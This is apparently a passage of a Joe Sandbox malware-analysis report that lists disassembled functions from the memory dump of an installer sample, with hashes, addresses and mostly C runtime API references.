                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                            • Instruction ID: 37aac61f5b60d70544b630b93c60c00e67fca44cab4e17c4a777f5d51ddae938
                            • Opcode Fuzzy Hash: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                            • Instruction Fuzzy Hash: DE51263551C7068FC314DF6CE8409EA73A1AFC5320F618B3EE856CB8D1EB75512A8B46
                            Function 6C145EC9 Relevance: .1, Instructions: 136COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction ID: c04d740ce22a9735b5a3df8f9c9c7c390bb3df38e747c70715857019e6394323
                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction Fuzzy Hash: 0E3114277A440103C70CC92BCC12B9FA1575BE462A75ECB796D05DAF55D52CC8165145
                            Function 6C27CB30 Relevance: .1, Instructions: 118COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2184a5465473c01ffeba0e55e573a57e6e9b2e405e2958d2d5a83c41b28c3c2
                            • Instruction ID: dacb8cdfdb7a69e2de92a31b6316a32d66a7e21149ae686da477a8233ee21c58
                            • Opcode Fuzzy Hash: f2184a5465473c01ffeba0e55e573a57e6e9b2e405e2958d2d5a83c41b28c3c2
                            • Instruction Fuzzy Hash: 8F419C72A487168FC304EE58EC804FBB3A6EFC8320F904B3D9865872D5D775691AC390
                            Function 6C2D8D12 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                            • Instruction ID: 02b47c699c2e2fdbcaa7ac4f0ddbcaa32012a60803bb9a167f083f911e0cf3f7
                            • Opcode Fuzzy Hash: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                            • Instruction Fuzzy Hash: 94318831A147128BD728DA39D4504ABB3E3EFC5318B55CB3DC4568B989EBB5600FCB81
                            Function 6C1CC700 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                            • Instruction ID: 54777b8f8835eb5daa63a8fef0237a2481095c2ca98e1989379f86d0ea921449
                            • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                            • Instruction Fuzzy Hash: 09218E77320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C785
                            Function 6C10D456 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ca14bff692ea6ebb197498d4c92bcd2209d751d4135e4f15546c3ee51eb7981
                            • Instruction ID: 3140c64bdbafd697fd3ad68b9ff8d8ccf14bb0a7783cab91c06be23d6788742e
                            • Opcode Fuzzy Hash: 4ca14bff692ea6ebb197498d4c92bcd2209d751d4135e4f15546c3ee51eb7981
                            • Instruction Fuzzy Hash: 7EF03031B15224DBDB12EA49D446B8973B8EB45BA9F114196E541EBA50CAB0ED40C7D0
                            Function 6C10D425 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction ID: cd8063af4191e394e1598bbc7f49ac04c6027de1bac188d0303f89b3ddb09d83
                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction Fuzzy Hash: DDE08C32A12238EBCB10DB88C904E8AF3ECEB45B04B1100A6F505D3A00CA70EE00C7D0
                            Function 6C1CA700 Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                            • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                            • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                            • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                            Function 6C161B50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: f19cd16012cc3e6964036b14e85b120fb3c5aeb617fa3fd7149d4dff2b8ec99f
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: 5DD1BF71A0420A9FCB01CFA5D990BEEB7B5FF15308F208569E055A3E60DB74E969CB60
                            Function 6C149798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: 2a22ad0319af3de643d54bd32378dc25cacea4c6728c5a0c3a4b2f7247789d34
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: E512AB71D0020AEFDF10DFA8C990AEDBBB9FF58318F248169E919AB650CB359945CF50
                            Function 6C0FD1C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD1F7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0FD1FF
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD288
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0FD2B3
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD308
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 2ba28cb210c56ef4064bf28510286617c7e30f823276184cfe2248fba659d674
                            • Instruction ID: 1d3873aba04cb27ce9418a763dd596181ebcc3a717547bb6ce04ffd1a526b152
                            • Opcode Fuzzy Hash: 2ba28cb210c56ef4064bf28510286617c7e30f823276184cfe2248fba659d674
                            • Instruction Fuzzy Hash: 8B418D34A01319ABCB00DF68C884B9E7BF5AF45328F148155ED389BB51DB31EA4ACBD1
                            Function 6C10A58A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: aa3d807050b525990be3d813b561ac968528076771a5457fa88fe4fb469e2f7e
                            • Instruction ID: 09d68f9dab81ce361c55e0696fbe48c3d213431859e730e82461b3bb3fb4b1f2
                            • Opcode Fuzzy Hash: aa3d807050b525990be3d813b561ac968528076771a5457fa88fe4fb469e2f7e
                            • Instruction Fuzzy Hash: A421BB76F05215FBDB118A79CC44B4B37B49B227B8F160621E815A7680DE38ED43D6E0
                            Function 6C10F5A1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(?,6C10E7C0,?), ref: 6C10F5E9
                            • __fassign.LIBCMT ref: 6C10F7C8
                            • __fassign.LIBCMT ref: 6C10F7E5
                            • WriteFile.KERNEL32(?,6C1191A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C10F82D
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C10F86D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C10F919
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 1ef2dc438e177460814f9db1ab8e6707af3ec413628d8470abda26c767abae27
                            • Instruction ID: 6acea5bd8e8e1d80db71bc931635242e2bf8e7be61e3032a140005c7ff5e42bb
                            • Opcode Fuzzy Hash: 1ef2dc438e177460814f9db1ab8e6707af3ec413628d8470abda26c767abae27
                            • Instruction Fuzzy Hash: F1D1BB75E012489FDF11CFA8C890AEDBBB5BF49314F28416AE865BB341DB30A946CF54
                            Function 6BFC2F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC2FD0
                            • __Getctype.LIBCPMT ref: 6BFC3084
                            • std::_Facet_Register.LIBCPMT ref: 6BFC309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC30B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID:
                            • API String ID: 1102183713-0
                            • Opcode ID: 2db35d923e1183b6971c27451d429bc18e84014a53934a6e34a85acfd93006d4
                            • Instruction ID: 020dbd19099d2de77f62c4380d05507ea7f9764567eb5b82993a31e73568c33a
                            • Opcode Fuzzy Hash: 2db35d923e1183b6971c27451d429bc18e84014a53934a6e34a85acfd93006d4
                            • Instruction Fuzzy Hash: 4C4167B2E002198FCB10CF98D854B9EB7F0FF44754F144169D829AB750D779AA85CBD2
                            Function 6C137FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: e0d3277be3df0922cd0516a464806aab047ffdf9aae5c5a8d02cab71b98e27ef
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: 6E219570641229FFEF119F94CC40EDF7A69EB517ACF208227B628A1590D275CD60DA61
                            Function 6C13D6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13D6F1
                              • Part of subcall function 6C14C173: __EH_prolog.LIBCMT ref: 6C14C178
                            • __EH_prolog.LIBCMT ref: 6C13D8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: 1674db2fa06b40af4c9a43fc2f8d17e09e0bb792a8689483594a21c8ce4257c5
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 4C71A130910264DFDB14EFA4C444BDDB7B5BF2530CF1080A9E8596BB91CB78BA49CB91
                            Function 6C1190FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6C1191CD
                            • _free.LIBCMT ref: 6C1191F6
                            • SetEndOfFile.KERNEL32(00000000,6C117DDC,00000000,6C10E7C0,?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000), ref: 6C119228
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000,?,?,?,?,00000000,?), ref: 6C119244
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: ef05d9f9ef414a8b94643c186a676b351a0e92c9df6c46b7d7081cc32b697d82
                            • Instruction ID: 815760f664a946c19c11c820e8f30c0ec832df3d3d7bda001b6eace29447cf8c
                            • Opcode Fuzzy Hash: ef05d9f9ef414a8b94643c186a676b351a0e92c9df6c46b7d7081cc32b697d82
                            • Instruction Fuzzy Hash: EB41D732A09605ABDB019FB8CC54BCE37B9AF46334F150525E934A7F90EF39D8894761
                            Function 6C151418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C15141D
                              • Part of subcall function 6C151E40: __EH_prolog.LIBCMT ref: 6C151E45
                              • Part of subcall function 6C1518EB: __EH_prolog.LIBCMT ref: 6C1518F0
                              • Part of subcall function 6C151593: __EH_prolog.LIBCMT ref: 6C151598
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: bdef2d712ce1ed56bd36b7a299ac8bb78f3955ff623cbb8cb958bce49a95a0c4
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: E221BBB1D01258AECF05DFE4D991AECBBB5AF25308F200069D41223780DB784E4CCB61
                            Function 6C151234 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J$DJ$`J
                            • API String ID: 3519838083-2453737217
                            • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction ID: b05fcdf49311fdae6694b2708eee3aa08fabf20b6053db07acabc1bfff837457
                            • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction Fuzzy Hash: FB11F2B0900B64CEC720CF5AC45029AFBE4BFA6708B10C90FC0A687B10C7F8A549CB99
                            Function 6C10281A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C1028A4,00000000,?,6C102925,6C0FD339,00000003,00000000), ref: 6C10282F
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C102842
                            • FreeLibrary.KERNEL32(00000000,?,?,6C1028A4,00000000,?,6C102925,6C0FD339,00000003,00000000), ref: 6C102865
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
